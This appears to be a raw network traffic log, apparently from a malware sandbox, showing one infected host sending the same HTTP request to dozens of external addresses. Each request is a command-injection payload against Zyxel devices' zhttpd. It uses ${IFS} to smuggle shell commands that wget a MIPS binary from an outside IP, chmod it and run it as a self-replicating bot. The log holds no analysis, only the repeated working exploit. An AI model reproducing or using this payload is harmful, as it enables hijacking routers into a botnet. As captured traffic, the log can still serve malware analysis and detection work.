                                    Jan 13, 2024 19:02:34.177297115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4318192.168.2.1334216170.46.170.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.177346945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4319192.168.2.13593169.240.55.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.177428007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4320192.168.2.1355634211.245.26.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.177493095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4321192.168.2.133690427.151.231.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.177567959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4322192.168.2.1342904153.252.140.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178034067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4323192.168.2.1351428200.17.6.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178102016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4324192.168.2.133488835.138.83.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178174973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4325192.168.2.1337228195.231.114.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178253889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4326192.168.2.1355298115.247.53.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178339005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4327192.168.2.1337820179.36.225.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178395033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4328192.168.2.13430842.94.104.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178486109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4329192.168.2.134543063.194.50.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178539038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4330192.168.2.1342634145.14.132.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178643942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4331192.168.2.1350800184.22.49.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178709984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4332192.168.2.1333234169.57.34.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178817987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4333192.168.2.1347360134.89.33.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178864956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4334192.168.2.135264297.164.251.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.178941965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4335192.168.2.1353728173.82.56.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179029942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4336192.168.2.133282077.51.122.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179073095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4337192.168.2.134261882.45.115.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179157019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4338192.168.2.134358819.13.31.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179238081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4339192.168.2.1355308162.196.247.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179310083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4340192.168.2.136068491.203.64.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179371119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4341192.168.2.1353388205.200.142.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179470062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4342192.168.2.1341124134.241.109.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179536104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4343192.168.2.1339132207.55.37.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179615021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4344192.168.2.134052040.164.41.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179706097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4345192.168.2.1335992191.250.225.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179758072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4346192.168.2.1346758193.229.167.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179846048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4347192.168.2.1351836155.89.147.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.179955959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4348192.168.2.1348894100.142.112.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180054903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4349192.168.2.1357542184.250.44.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180125952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4350192.168.2.135583274.91.200.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180216074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4351192.168.2.1359856113.76.188.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180306911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4352192.168.2.134862037.195.244.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180388927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4353192.168.2.136065836.116.21.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180459023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4354192.168.2.13427645.154.233.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180552006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4355192.168.2.1335672172.210.199.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180617094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4356192.168.2.1344866199.93.85.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180694103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4357192.168.2.135966266.113.1.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180759907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4358192.168.2.1354220218.83.235.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180851936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4359192.168.2.134310845.19.247.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.180934906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4360192.168.2.13511861.116.72.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181009054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4361192.168.2.1348758122.179.18.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181066990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4362192.168.2.134204891.194.14.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181154966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4363192.168.2.1353848187.85.207.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181238890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4364192.168.2.134438034.39.244.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181297064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4365192.168.2.1338922170.120.55.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181358099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4366192.168.2.1335668136.165.84.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181437016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4367192.168.2.1335116166.7.190.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181500912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4368192.168.2.134296044.214.96.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181618929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4369192.168.2.1342480157.28.25.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181662083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4370192.168.2.135596868.182.64.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181746960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4371192.168.2.134213852.60.217.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181849957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4372192.168.2.136061270.100.35.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181885004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4373192.168.2.13483722.150.0.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.181999922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4374192.168.2.133875869.27.224.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.182087898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4375192.168.2.134663287.152.26.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.182121038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4376192.168.2.1339680206.222.177.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.182194948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4377192.168.2.135899693.113.181.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.182265997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4378192.168.2.134343465.115.222.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.182363987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4379192.168.2.1356754116.4.154.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.182441950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4380192.168.2.1355152179.230.135.246443
                                    TimestampBytes transferredDirectionData
